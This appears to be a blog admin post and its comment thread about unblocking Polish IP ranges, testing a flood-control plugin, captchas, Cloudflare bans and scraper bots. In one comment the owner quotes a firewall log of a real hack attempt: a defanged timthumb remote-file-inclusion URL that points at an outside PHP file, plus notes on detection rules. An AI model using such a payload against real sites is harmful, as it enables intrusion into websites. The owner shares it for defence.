Admin: Poland & Flood Control.

Two Admin Notes:

  • Polish network is now unblocked.
  • I activated flood control software. Tell me if you see pesky captchas.

    The Polish Network
    Some Poles using “tpnet.pl” got blocked. The author of ZB Block gives the reason as “Network turned clean, turned dirty again.”

    He may very well be right. But it’s clear this block has false positives. The visitors were coming from http://doskonaleszare.blox.pl/2012/07/ensembles.html and clearly are people discussing the Watts paper (in Polish, which my brother-in-law and niece speak but I don’t).

    It seems I need a password to comment there. So, I’ll do second best and mention the issue here.

    To those potential visitors, apologies! I have unblocked the Polish ranges from ZB Block and also unbanned the two IPs whose entire ban was escalated to Cloudflare. (In fact, in case other totally innocent Poles were blocked, I went whole hog and unbanned entire ranges like 123.456.789.0/24.)

    If this leaves a ping at the Polish blog and anyone there knows people who are blocked and wish to read any posts here, convey my apologies to them. Also, have someone not blocked send me their IP and I will unblock that range. If they don’t request unblocking, the IPs will automatically unblock within a week. Apologies for the trouble.
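    Unbanning a whole range rather than a single IP can be pictured with a short, hedged sketch. It is not ZB Block's or Cloudflare's actual mechanism; the range list and the function name `is_unblocked` are hypothetical, and the addresses are reserved documentation ranges, not the real Polish ones.

```python
import ipaddress

# Hypothetical allow-list. These are reserved documentation ranges,
# standing in for the ranges that were actually unbanned.
UNBLOCKED_RANGES = [
    ipaddress.ip_network("192.0.2.0/24"),
    ipaddress.ip_network("198.51.100.0/24"),
]


def is_unblocked(ip: str) -> bool:
    """Return True if the address falls inside any unblocked range."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in UNBLOCKED_RANGES)
```

    A /24 covers 256 addresses, so unbanning one range frees every customer of that ISP block at once, including any who never asked.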

    The Flood control
    Sudden flooding by bots had become very rare, but I experienced a flood last night. A bot that did not declare its provenance in robots.txt raced through all the categories at a rate of 10 hits per second. This is precisely the sort of behavior that can crash blogs. (The blog didn’t crash though.) I hunted down a flood control plugin which I’m testing out.

    The flood control software has already presented me with obnoxious captchas when I log into wp-admin. Let me know if it presents obnoxious messages to you. The purpose is not to pester people. If it does, that solution will be deemed unsuitable. (Note: the plugin is supposed to be “tweaked”. So it may be that a tweak will be sufficient to fix. I also implemented another potential remedy that will have no untoward effects on people, but may not work.)

    Meanwhile, carry on discussing Zeke and Watts’ temperatures.

    23 thoughts on “Admin: Poland & Flood Control.”

    1. I thought this post had something to do with extreme weather in Poland!

      I blame fracking.

    2. BillC–
      Heh! I can see why. Maybe a few Poles will stop by and tell us whether there is any flooding in Poland.

    3. I’m curious what the plugin’s obnoxious captchas are like compared to yours.

    4. Brandon–They are using Google’s captchas.

      The obnoxious aspect happened only when I tried to log in. I’m using the default flood settings (which I haven’t inspected!). But when I log in, I always do several things fairly quickly (some of which are... maybe odd!).

      I enter “http://rankexploits.com/musings/wp-admin” and hit return. This redirects to http://rankexploits.com/musings/wp-login very quickly. So that’s two hits very fast! Then, as soon as I start typing my user name, my mac fills in the passwords, so I click “login”… quickly. Then, the page loads, and I immediately click to navigate. So I am clicking pretty quickly. The flood filter finds this all very suspicious and presents me with captchas.

      I answered… and then also immediately added my IP to the whitelist! (I need to look at the logs to see if any floods occurred today!)

    5. lucia, if that’s the CAPTCHA system I think it is, I think it should be surprisingly easy to break. Because of the spacing in it, the lines are basically useless. I believe it even uses consistent fonts. Heck, I think it’s noiseless and uses binary colors too.

      That means the only meaningful protection it has is distortion. That’s useful but nowhere near sufficient.

    6. Brandon– It might be. I’m going to see if I get any floods. But to make it effective at preventing floods or rapid scrapes, maybe the answer is to add a “time out” either before the captcha is displayed or after the captcha is processed. Humans aren’t going to answer it in less than 5 seconds, and that’s at least enough to make the bot slow down. I’m not sure if it would save the blog from crashing, but it would prevent the bot from scraping 20 pages quickly. Also… given the pre-existing code, I may be able to read the ban file and ban them at Cloudflare. Some thought might be required. For now… maybe the current generation of scrapers doesn’t solve it anyway!
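      The “time out” idea can be sketched as a minimum solve time. This is one possible reading, not how the plugin works: the function names are hypothetical, the 5-second floor comes from the remark above, and charging one delayed captcha per page is an assumption.

```python
MIN_SOLVE_SECONDS = 5.0  # assumed floor, from the "less than 5 seconds" remark


def captcha_passed(shown_at: float, answered_at: float, answer_correct: bool) -> bool:
    """Accept an answer only if it is correct and not implausibly fast."""
    elapsed = answered_at - shown_at
    return answer_correct and elapsed >= MIN_SOLVE_SECONDS


def min_seconds_for_pages(pages: int) -> float:
    """Lower bound on scrape time, assuming one delayed captcha per page."""
    return pages * MIN_SOLVE_SECONDS
```

      Under those assumptions a bot that wants 20 pages needs at least 100 seconds, even if it solves every captcha correctly.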

    7. I think that you don’t need password to post on ‘doskonaleszare’, unless you want your nick registered.

    8. pdjakow–
      Oh! It looks like I should have scrolled down! I started filling the top boxes which required a password. Not understanding Polish, I allowed myself to be defeated.

    9. I found a second Polish range that was unfairly blocked. (Different hosting company.) The group unblocked yesterday were at .tpnet.pl. I saw obvious honest-to-goodness humans coming from chello.pl blocked this morning. Sorry…

      (I do need to block to keep the blog running. But the defaults are sometimes a bit harsh on certain people who have no choice but to get service with ISPs who do have other customers who send out lots of not so nice connections. My other blocks will still protect against truly bot-operated nasty stuff other customers on those ranges might do.)

    10. I don’t see any captchas but I noticed the July UAH anomaly of 0.28.

      I’ve no idea what my un-idiot-proof guess was – a fair bit higher I think. 🙂

    11. So looking at this backwards, why is this blog attracting so much spam? Something odd is happening AFAEKS

      PS caught a captcha yesterday.

    12. Eli–

      It’s not so much spam as hack attempts. Spam is pretty mild. Someone just wants to put a stupid comment into the comments system.

      I intercept lots and lots of XSS, RFI and other hack attempts daily. Also, the flood control is (probably) for scraping which is a different issue. The flood control did catch something trying to flood the blog. I also caught a different thing trying to flood with a method I devised. The slightly edited catch is

      #: 82698 @: < redacted > Running: 0.4.10a1
      Host: lc3.cae.com
      IP: 142.39.230.100
      Score: 1
      Violation count: 1 INSTA-BANNED
      Why blocked: < redacted > . INSTA-BAN. You have been instantly banned! |-| || ( ax=0) [CA] ; ( 0 )
      Query:
      Referer: < redacted >
      User Agent: < redacted >
      Reconstructed URL: < redacted >

      I’m redacting the reason and information involved that made me know I should ban it to keep my method super secret. 🙂

      But I looked up lc3.cae.com and they have been accused of very fast scraping in the past. See
      http://www.stopforumspam.com/forum/viewtopic.php?id=2705

      The person complaining there wrote

      “The customary 30 IPs attempting to scrape my site in the last 24 hours, including two at 353 pages / sec and 219 pages / sec:

      207.96.208.130 : lc2.cae.com
      142.39.230.100 : lc3.cae.com”

      Looking at the server logs, lc3.cae.com was gearing up to try to load at rates comparable to that! I got it banned at cloudflare within a few seconds. But… wow!!!

      This sort of thing would crash the blog.

      I don’t know why they hit me. But they do.

      By the way, my method of initial detection only worked because the bot was stooooooopid. I need to code to get the flood control plugin to also auto-ban at cloudflare. But

      1) I also need to make sure that isn’t catching people.

      That can easily be done by tweaking the settings. I’m the one most likely to be caught– or any other author. Few people will click as fast as we do in wp-admin.
      and
      2) I need to figure out HOW to auto-ban those IPs while also warning them. (I think I might just read the flood control ban file in ZBblock and then tell them they are in it!)

    13. Eli

      PS caught a captcha yesterday.

      Thanks for letting me know. I think I’m going to change the settings to letting people load 2 pages in 2 seconds. The default is 1 per 1 second. These sound similar, but they aren’t quite, because I think if you get autoforwarded, you hit the 2nd page in less than a second. But you wouldn’t go on and hit a 3rd. So with 2 pages in 2 seconds you’re OK.
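      The difference between “1 per 1 second” and “2 per 2 seconds” shows up in a minimal sliding-window sketch. The plugin's real algorithm is not described in this thread, so the class `SlidingWindowLimiter` and its counting rule are assumptions made for illustration.

```python
from collections import deque


class SlidingWindowLimiter:
    """Allow at most max_hits requests within any window_seconds span."""

    def __init__(self, max_hits: int, window_seconds: float):
        self.max_hits = max_hits
        self.window_seconds = window_seconds
        self._hits = deque()  # timestamps of recent requests, allowed or not

    def allow(self, now: float) -> bool:
        # Drop timestamps that have aged out of the window.
        while self._hits and now - self._hits[0] >= self.window_seconds:
            self._hits.popleft()
        # Record this request, then check the count inside the window.
        self._hits.append(now)
        return len(self._hits) <= self.max_hits


# An auto-forward: two hits 0.2 s apart.
default = SlidingWindowLimiter(max_hits=1, window_seconds=1.0)
print([default.allow(t) for t in (0.0, 0.2)])  # second hit is flagged

relaxed = SlidingWindowLimiter(max_hits=2, window_seconds=2.0)
print([relaxed.allow(t) for t in (0.0, 0.2)])  # both hits pass
```

      With the relaxed setting a redirect followed by a pause passes, while a bot at 10 hits per second is still flagged on its third request.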

    14. Eli —
      Examples of outright hack attempts include:


      #: 83148 @: Thu, 09 Aug 2012 13:16:36 -0700 Running: 0.4.10a1
      Host: static.223.127.47.78.clients.your-server.de
      IP: 78.47.127.223
      Score: 5
      Violation count: 1 INSTA-BANNED
      Why blocked: ; Suspected hack attempt INSTA-BAN. serve: HTTP Server Detection, usually infected. INSTA-BANNED. You have been instantly banned! |-| (1: //wp- ) Anonymizing or proxy host. INSTA-BAN. (2: -server ) It looks like you are trying to call the theme directly. INSTA-BAN. Fingerprint, scrape or hack behavior. INSTA-BAN. (4: /wp-content/theme ) || ( ax=0) ( Caution: php sniff? -- bypass /themes/ ); [DE] ( 404=1 ) ; ( 0 )
      Query:
      Referer:
      User Agent: Samsung-SPHM540 Polaris/6.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
      Reconstructed URL: http:// rankexploits.com /musings/2011/sorry-bergen-norway//wp-content/themes/Spectrum?src=http:// picasa.c0m.michelle-hall.c0m /andalas.php


      (I’ve changed o’s to 0’s… and broken stuff to get around WP’s turning things into links…)

      Everything with src=http: is a hack attempt. You can read about timthumb here http://wpmu.org/timthumb-zero-day-vulnerability-affects-hundreds-of-wordpress-themes/ You’ll see the “Spectrum” theme is vulnerable. I don’t have that at my blog… but that’s something trying to hit it.
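      The “src=http:” pattern is easy to test for. The sketch below is not ZBblock's rule (ZBblock is PHP and its signatures are not shown here); the function name is hypothetical, and treating https the same as http is an added assumption.

```python
from urllib.parse import parse_qsl, urlsplit


def has_remote_src(url: str) -> bool:
    """Return True if a 'src' query parameter points at a remote URL."""
    query = urlsplit(url).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # Assumption: https is treated the same as the http case in the post.
        if name.lower() == "src" and value.lower().startswith(("http:", "https:")):
            return True
    return False
```

      A request such as `/wp-content/themes/Spectrum?src=http://evil.example/andalas.php` would be flagged, while `?src=logo.png` or `?p=123` would not.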

      I have been hit by many, many “free penetration testers”. It’s not just a theory. I know because ZBblock blocked them and then I looked up the URI and referrers. I’ve seen user agents for penetration testing.

      Now… penetration testing is a good thing if I do it on my own site. That way I learn of the vulnerability and then eliminate it before someone else finds it. But if someone else does it, it’s a way to identify a vulnerability so you can hack in.

      I’m also seeing lots of hack attempts from behind anonymous proxy services.

      I also see some funny things. Some people in various countries in the Arabian Peninsula (and today India) really, really, really want to look at this image:

      The entity– which I am sure is bot like– keeps returning about 10 times a day for a month trying to load that image.

    15. I understand the authors at Scientific American are preparing a series of articles attributing the flood to increased atmospheric CO2

    16. By the way, I have organized things so ZBblock now reads the flood control list. The warning states:
      $whyblockout="

      Flooding or Scraping detected

      Your IP address [$address] appears [$in_flood_control] time(s) in the permanent flood control banlist. It was entered after being detected requesting pages more than once per second and subsequently failing a captcha.

      This rate of requesting pages is not consistent with being a blog reader and looks much more like a nasty scraper bot. My hobby blog cannot tolerate this sort of thing. No way. No how. Scraping makes the whole thing crash, and then no one can read the blog.

      It is possible your IP got into this list through no fault of your own. If you wish your IP to be removed from that particular ban list, you MUST contact me. If you know my private email, you may send me email using that address. When you contact me, you MUST send me the information below. If you do not know my private email, click the email link and use my spamgourmet email address. Note: the purpose of the spamgourmet email address is to protect my email address from spammers– many of whom see this error page.

      ";

      I may eventually code to auto-remove the IPs in flood control when I ban at cloudflare…. but for now… no.
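      Reading the flood-control list and building the warning can be sketched in a few lines. The ban-file format is not given in this thread, so one IP per line is an assumption, and both function names are hypothetical; the real hook lives in ZBblock's PHP.

```python
from typing import Optional


def count_in_banlist(address: str, banlist_text: str) -> int:
    """Count ban-list lines that exactly match the address (assumed one IP per line)."""
    return sum(1 for line in banlist_text.splitlines() if line.strip() == address)


def flood_warning(address: str, banlist_text: str) -> Optional[str]:
    """Return the warning text if the address is listed, otherwise None."""
    hits = count_in_banlist(address, banlist_text)
    if hits == 0:
        return None
    return (
        f"Your IP address [{address}] appears [{hits}] time(s) "
        "in the permanent flood control banlist."
    )
```

      Matching whole lines rather than substrings matters: a substring test on `192.0.2.1` would also hit `192.0.2.10`.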

    17. Eli–
      I have no idea what the reason is. I’m on shared hosting. There’s lots of stuff on the server.

      I do know that I had a mega-firestorm of hits from bezeq in Israel when I was sending a letter explaining to them that according to the 9th circuit court in the US, hotlinking is not a copyright violation. bezeq was (and still is) rumored to host picscout, which is the image-trolling bot that Getty now owns and supposedly goes around looking for copyright violations. I blogged about their hits– but didn’t mention the letter exchange that was happening concurrently.

      http://rankexploits.com/musings/2011/bezeqint-net-is-this-an-attack/

      Based on what I see in server logs, I tend to suspect some of the scraping may well be related to the image/copyright bots. There are some pretty obvious attempts to load images, and I’ve done “things” that make it obvious that a bot keeps trying and failing to load the same dang images over and over, but from different IPs. Sort of like the one above. It’s pretty to see “things” trying to hit an image with certain types of connections, get banned, come back (always from servers), etc. And these are all perfectly visible images for which I (or Zeke) own the copyright!

      But I’ve actually got the image scraping down to where — if the image bots would just not do stupid things– they could see the images they want– provided they tread lightly and not try to scrape 1000 images in an hour!

      But other stuff…. no. It’s not image-copyright bots. I think some of it is merely that because the blog ‘pings’ and has a lot of incoming links, stuff finds its way here. But some of it… really…. I know there has been penetration testing done. I know because ZBblock interrupted it and the connection pointed to a “penetration testing” site. Their site user agreement makes the user promise not to use it against a site they don’t control– but clearly…. they don’t enforce that. (They could enforce this by insisting the site owner insert a hidden code field on a page at their site.)

      I banned that and then two more came around!!!!

      I’d be interested in knowing what RC’s logs look like. I betcha’ that if the guys blogging actually saw their logs they’d see some similar stuff. But they also may be on a dedicated host so their server may have a real firewall that blocks bad things at the router. I’m on shared hosting… so… tough luck for me!

      Cloudflare is helping a lot. I’ve banned a huge number of servers with bad reputations by IP. Oh. And I banned Brazil and China. Those helped a lot. For a time I banned Israel. But now, just Bezeqint.

    18. A minor nit lucia:

      But they also may be on a dedicated host so their server may have a real firewall that blocks bad things at the router.

      If you’re using a firewall to block things, you aren’t blocking them at the router. You’re blocking them at the firewall. The firewall is there to stop those things from ever reaching the router.

    19. Brandon… shows what I know! 🙂

      (Note to self: change “at” to before. Then I can make myself look smart and Brandon look mean. Bwah hah hah!!!)

    20. lucia, if it makes you feel better, you can have a single device serve as both a firewall and router. You can even configure a router to work as a gimped firewall. Neither is desirable, but both do happen.

      By the way, I feel I ought to warn you. If you start editing comments to make me look bad, I’ll start posting comments which make it look like you’re editing comments to make me look bad. After a while, nobody will trust you!

      I think I can out evil genius you. Mwah, hah, hah?

    21. Being a bit pedantic, and being a network designer.. Form should follow function. If the firewall is the first box on the end of an ISP link, then it’s usually acting as a router. Especially if the ISP connection’s an Ethernet and you’re not doing anything complex on your network. Companies that sell tin however like to try and convince customers that you need routers and firewalls, and firewalls protecting routers. They sell more tin that way. Then I get paid to try and put it all together, especially when clients want resiliency.

      For simple dedicated hosting, a router may be unnecessary and a decent firewall more useful because they can look deeper into the connection requests. Routers are best left to what they’re mostly designed for, being high-speed packet directors and limited to doing basic IP or port blocking. Some can slow waaay down if black/white lists are too long though.

    22. Atomic Hairdryer, of course many routers and firewalls provide some of the functions of the other. I don’t see how that’s relevant though. Was your comment just a random observation (which I have no problem with), or am I missing some connection?
